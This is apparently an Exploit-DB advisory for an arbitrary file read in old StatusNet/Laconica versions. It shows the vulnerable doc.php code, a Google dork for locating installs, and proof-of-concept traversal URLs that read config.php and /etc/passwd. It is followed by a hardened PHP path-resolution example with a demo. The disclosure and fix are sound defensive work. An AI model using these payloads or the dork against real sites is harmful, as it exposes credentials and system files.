StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading

EDB-ID: 28956
Platform: PHP
Published: 2013-10-14

+-------------------------------------------------------------------------------+
+ StatusNet/Laconica <= 0.7.4, <= 0.8.2, <= 0.9.0beta3 - arbitrary file reading +
+-------------------------------------------------------------------------------+

# Date:
	- 10/10/2013

# Exploit Author:
	- spiderboy

# Vendor Homepage:
	- http://status.net/

# Software Links:
	- http://status.net/laconica-0.7.4.tar.gz
	- http://status.net/statusnet-0.8.2.tar.gz
	- http://status.net/statusnet-0.9.0beta3.tar.gz

# Version:
	- Branch 0.7.X : <= 0.7.4
	- Branch 0.8.X : <= 0.8.2
	- Branch 0.9.X : <= 0.9.0beta3

# Tested on:
	- Unix/Linux

# Category:
	- Webapps

# Platform:
	- php

# Advisories :
	- http://status.net/wiki/Security_alert_0000002
	- http://osvdb.org/show/osvdb/95586

# Google Dork:
	- "It runs the StatusNet microblogging software, version 0.8.2"

# Vendor product description:
	- Free and Open Source social software

# Vulnerable code:
	- actions/doc.php:
	--------------------------------------------------------------------
	function handle($args)
	{
		parent::handle($args);
		$this->title    = $this->trimmed('title');
		$this->filename = INSTALLDIR.'/doc-src/'.$this->title; //[1]
		if (!file_exists($this->filename)) {
			$this->clientError(_('No such document.'));
			return;
		}
		$this->showPage();
	}
	--------------------------------------------------------------------
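	[1] : No check on the user-supplied parameter $this->title before it is appended to the doc-src path, so "../" sequences in title resolve to files outside that directory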

# Proof of concept:
	- http://[host]/index.php?action=doc&title=../config.php
	- http://[host]/index.php?action=doc&title=../../../../../../../../etc/passwd

# Solution:
	- Upgrade to the latest version: http://status.net/download
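
A hardened form of the path construction flagged at [1], as an added example that is not StatusNet code and not the vendor's fix. The helper name `resolve_doc_path()`, the allow-list pattern (it assumes document titles are plain names without an extension) and the temporary demo tree are all assumptions made for illustration.

```php
<?php
// Added example: resolve_doc_path() is a hypothetical helper, not StatusNet code.
// Returns the canonical path of a document inside $docRoot, or null when the
// title is malformed, missing, or resolves outside that directory.
function resolve_doc_path(string $docRoot, string $title): ?string
{
    // Allow-list (assumption: doc titles are plain names with no extension).
    if (!preg_match('/\A[A-Za-z0-9_-]+\z/', $title)) {
        return null;
    }
    $root = realpath($docRoot);
    if ($root === false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks; false if the target is missing.
    $path = realpath($root . DIRECTORY_SEPARATOR . $title);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Containment: the canonical path must sit under the canonical root.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo tree standing in for INSTALLDIR (Unix-like host assumed).
$install = sys_get_temp_dir() . '/docdemo_' . bin2hex(random_bytes(4));
mkdir($install . '/doc-src', 0700, true);
file_put_contents($install . '/doc-src/help', 'help text');
file_put_contents($install . '/config.php', '<?php // constructed secret');
// A symlink inside doc-src passes the allow-list but fails containment.
symlink('../config.php', $install . '/doc-src/leak');

$titles = ['help', '../config.php', '../../../../../../../../etc/passwd', 'leak', 'missing'];
foreach ($titles as $t) {
    $r = resolve_doc_path($install . '/doc-src', $t);
    printf("%-36s => %s\n", $t, $r === null ? 'rejected' : 'served');
}

// Remove the constructed files.
unlink($install . '/doc-src/leak');
unlink($install . '/doc-src/help');
unlink($install . '/config.php');
rmdir($install . '/doc-src');
rmdir($install);
```

Only `help` is served. The two title values from the proof of concept fail the allow-list, and the `leak` symlink shows why the canonical-path containment check is kept as a second layer.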